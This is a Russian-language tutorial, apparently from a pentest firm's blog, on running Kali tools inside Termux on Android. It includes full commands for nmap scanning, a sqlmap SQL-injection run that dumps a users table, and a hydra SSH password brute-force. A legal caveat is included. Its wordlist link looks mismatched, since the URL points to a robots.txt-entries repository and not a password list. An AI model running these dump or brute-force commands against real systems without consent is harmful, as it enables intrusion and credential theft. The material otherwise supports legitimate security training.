Termux – это полноценный терминал Linux для Android, который позволяет запускать пакеты из репозиториев apt. Благодаря совместимости с архитектурой ARM и поддержке proot, в Termux можно установить почти все инструменты из дистрибутива Kali Linux. В статье рассматриваются шаги подготовки окружения и три практических примера использования Kali‑инструментов: nmap, sqlmap и hydra.
1. Подготовка окружения
Перед установкой Kali‑инструментов необходимо выполнить базовую настройку Termux.
# Обновляем репозитории и пакеты
apt update && apt upgrade -y
# Устанавливаем необходимые утилиты
apt install -y wget curl git proot-distro
# Добавляем хранилище Termux (для доступа к файлам Android)
termux-setup-storage
Для получения полного набора Kali‑инструментов удобно установить kali‑tools из официального репозитория Kali Linux, используя proot-distro.
# Скачиваем образ Kali Linux (ARM64)
proot-distro install kali
# Запускаем окружение Kali
proot-distro login kali
# Обновляем репозитории внутри Kali
apt update && apt full-upgrade -y
# Устанавливаем набор базовых Kali‑инструментов
apt install -y kali-tools-top10
После выполнения этих команд вы получите доступ к более чем 100 предустановленным утилитам из Kali.
2. Пример 1: Сканирование сети с помощью nmap
Инструмент nmap позволяет быстро собрать информацию о хостах, открытых портах и сервисах.
# Запуск nmap для обнаружения живых хостов в подсети 192.168.1.0/24
nmap -sn 192.168.1.0/24
# Сканирование открытых портов и сервисов на конкретном хосте
nmap -sV -p 1-1000 192.168.1.42
Результат сканирования выводится в виде списка обнаруженных сервисов, их версий и возможных уязвимостей.
3. Пример 2: Тестирование веб‑приложения с sqlmap
sqlmap автоматизирует поиск и эксплуатацию SQL‑инъекций. Ниже показан пример проверки уязвимости GET‑параметра id на тестовом сайте.
# Запускаем sqlmap с базовыми параметрами
sqlmap -u "http://example.com/vuln.php?id=1" --batch --risk=3 --level=5
# Автоматическое получение базы данных и таблиц
sqlmap -u "http://example.com/vuln.php?id=1" --batch -D testdb -T users --dump
Опция --batch отключает интерактивные запросы, а --risk/--level управляют глубиной тестирования.
4. Пример 3: Брутфорс SSH с помощью hydra
Для демонстрации атаки перебором используем hydra и словарь паролей.
# Скачиваем небольшой словарь (пример)
wget https://github.com/danielmiessler/RobotsDisallowed/raw/master/words.txt -O passwords.txt
# Запускаем hydra против SSH‑сервера 10.0.0.5
hydra -L usernames.txt -P passwords.txt ssh://10.0.0.5 -t 8 -V
Опция -t 8 задаёт количество параллельных потоков, а -V выводит подробный лог каждой попытки.
5. Лучшие практики и ограничения
- Всегда запускайте инструменты в режиме
rootвнутриproot-distro(командаsudo suпосле входа в Kali). - Учитывайте ограничения батареи и тепловой режим Android‑устройства – длительные сканирования могут привести к перегреву.
- Для сохранения результатов используйте общую папку
/data/data/com.termux/files/home/storage/shared/termux, которая доступна из Android‑файлового менеджера. - Не забывайте о юридических аспектах: тестировать системы без явного согласия запрещено.
Заключение
Интеграция Kali‑инструментов в Termux открывает широкие возможности для мобильного пентеста, обучения и быстрого прототипирования. С помощью proot-distro вы получаете полноценный Kali‑дистрибутив, а практические примеры с nmap, sqlmap и hydra демонстрируют, как эффективно использовать эти инструменты прямо на смартфоне.
Если вам требуется более глубокий аудит, настройка кастомных скриптов или обучение персонала – команда RybinskLab готова помочь. Мы предоставляем услуги по проведению профессионального пентеста, разработке автоматизированных тестовых стендов и проведению воркшопов по кибербезопасности. Свяжитесь с нами, чтобы вывести ваш уровень защиты на новый уровень.